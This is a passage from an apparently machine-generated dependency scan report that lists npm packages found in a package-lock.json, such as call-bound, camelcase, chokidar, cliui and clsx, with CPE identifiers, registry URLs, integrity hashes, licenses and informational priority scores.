- cpe: cpe:2.3:a:call_bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call_bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/call-bind-apply-helpers@1.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz
|
|
integrity: sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==
|
|
dependencies:
|
|
es-errors: ^1.3.0
|
|
function-bind: ^1.1.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4e5277c95313e881
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: call-bound 1.0.4'
|
|
title: call-bound 1.0.4
|
|
description: 'Package discovered: call-bound 1.0.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 23c8e695a4ffce79
|
|
name: call-bound
|
|
version: 1.0.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:call-bound:call-bound:1.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call-bound:call_bound:1.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call_bound:call-bound:1.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call_bound:call_bound:1.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call:call-bound:1.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call:call_bound:1.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/call-bound@1.0.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz
|
|
integrity: sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==
|
|
dependencies:
|
|
call-bind-apply-helpers: ^1.0.2
|
|
get-intrinsic: ^1.3.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a4cb8d0a4eb7503f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: camelcase 5.3.1'
|
|
title: camelcase 5.3.1
|
|
description: 'Package discovered: camelcase 5.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 98453e2c1718f20f
|
|
name: camelcase
|
|
version: 5.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:camelcase:camelcase:5.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/camelcase@5.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz
|
|
integrity: sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3b9efee290bbc139
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: camelcase-css 2.0.1'
|
|
title: camelcase-css 2.0.1
|
|
description: 'Package discovered: camelcase-css 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b224930ed183bceb
|
|
name: camelcase-css
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:camelcase-css:camelcase-css:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:camelcase-css:camelcase_css:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:camelcase_css:camelcase-css:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:camelcase_css:camelcase_css:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:camelcase:camelcase-css:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:camelcase:camelcase_css:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/camelcase-css@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/camelcase-css/-/camelcase-css-2.0.1.tgz
|
|
integrity: sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 54ace4d8b29c3fad
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: caniuse-lite 1.0.30001791'
|
|
title: caniuse-lite 1.0.30001791
|
|
description: 'Package discovered: caniuse-lite 1.0.30001791'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 574728aff770dffd
|
|
name: caniuse-lite
|
|
version: 1.0.30001791
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: CC-BY-4.0
|
|
spdxExpression: CC-BY-4.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:caniuse-lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:caniuse-lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:caniuse_lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:caniuse_lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:caniuse:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:caniuse:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/caniuse-lite@1.0.30001791
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001791.tgz
|
|
integrity: sha512-yk0l/YSrOnFZk3UROpDLQD9+kC1l4meK/wed583AXrzoarMGJcbRi2Q4RaUYbKxYAsZ8sWmaSa/DsLmdBeI1vQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d2ccf1883f8178ec
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: chokidar 3.6.0'
|
|
title: chokidar 3.6.0
|
|
description: 'Package discovered: chokidar 3.6.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e6e064efe5c17d2c
|
|
name: chokidar
|
|
version: 3.6.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:chokidar:chokidar:3.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/chokidar@3.6.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz
|
|
integrity: sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==
|
|
dependencies:
|
|
anymatch: ~3.1.2
|
|
braces: ~3.0.2
|
|
glob-parent: ~5.1.2
|
|
is-binary-path: ~2.1.0
|
|
is-glob: ~4.0.1
|
|
normalize-path: ~3.0.0
|
|
readdirp: ~3.6.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 265715c369a6ec46
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: client-only 0.0.1'
|
|
title: client-only 0.0.1
|
|
description: 'Package discovered: client-only 0.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e7be86c370ee2217
|
|
name: client-only
|
|
version: 0.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:client-only:client-only:0.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:client-only:client_only:0.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:client_only:client-only:0.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:client_only:client_only:0.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:client:client-only:0.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:client:client_only:0.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/client-only@0.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/client-only/-/client-only-0.0.1.tgz
|
|
integrity: sha512-IV3Ou0jSMzZrd3pZ48nLkT9DA7Ag1pnPzaiQhpW7c3RbcqqzvzzVu+L8gfqMp/8IM2MQtSiqaCxrrcfu8I8rMA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c077917c166ed35e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cliui 6.0.0'
|
|
title: cliui 6.0.0
|
|
description: 'Package discovered: cliui 6.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0b1fbe7259e117a1
|
|
name: cliui
|
|
version: 6.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:cliui:cliui:6.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/cliui@6.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz
|
|
integrity: sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ==
|
|
dependencies:
|
|
string-width: ^4.2.0
|
|
strip-ansi: ^6.0.0
|
|
wrap-ansi: ^6.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b756cde7127582a3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cliui 8.0.1'
|
|
title: cliui 8.0.1
|
|
description: 'Package discovered: cliui 8.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6699f516cd09331f
|
|
name: cliui
|
|
version: 8.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:cliui:cliui:8.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/cliui@8.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz
|
|
integrity: sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==
|
|
dependencies:
|
|
string-width: ^4.2.0
|
|
strip-ansi: ^6.0.1
|
|
wrap-ansi: ^7.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6102e65c9c7e3be7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: clone 2.1.2'
|
|
title: clone 2.1.2
|
|
description: 'Package discovered: clone 2.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 924490c8cb0d8bef
|
|
name: clone
|
|
version: 2.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:clone:clone:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/clone@2.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/clone/-/clone-2.1.2.tgz
|
|
integrity: sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: de7fc275efead359
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: clsx 2.1.1'
|
|
title: clsx 2.1.1
|
|
description: 'Package discovered: clsx 2.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1cdd74d474651cd1
|
|
name: clsx
|
|
version: 2.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:clsx:clsx:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/clsx@2.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/clsx/-/clsx-2.1.1.tgz
|
|
integrity: sha512-eYm0QWBtUrBWZWG0d386OGAw16Z995PiOVo2B7bjWSbHedGl5e0ZWaq65kOGgUSNesEIDkB9ISbTg/JK9dhCZA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 03115b0621f3a47e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cluster-key-slot 1.1.2'
|
|
title: cluster-key-slot 1.1.2
|
|
description: 'Package discovered: cluster-key-slot 1.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 635dabdd9cdc8fd8
|
|
name: cluster-key-slot
|
|
version: 1.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:cluster-key-slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster-key-slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster_key_slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster_key_slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster-key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster-key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster_key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster_key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cluster:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/cluster-key-slot@1.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz
|
|
integrity: sha512-RMr0FhtfXemyinomL4hrWcYJxmX6deFdCxpJzhDttxgO1+bcCnkk+9drydLVDmAMG7NE6aN/fl4F7ucU/90gAA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 56e4289efb51aa13
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: color-convert 2.0.1'
|
|
title: color-convert 2.0.1
|
|
description: 'Package discovered: color-convert 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fcc3d45495abf3bd
|
|
name: color-convert
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:color-convert:color-convert:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
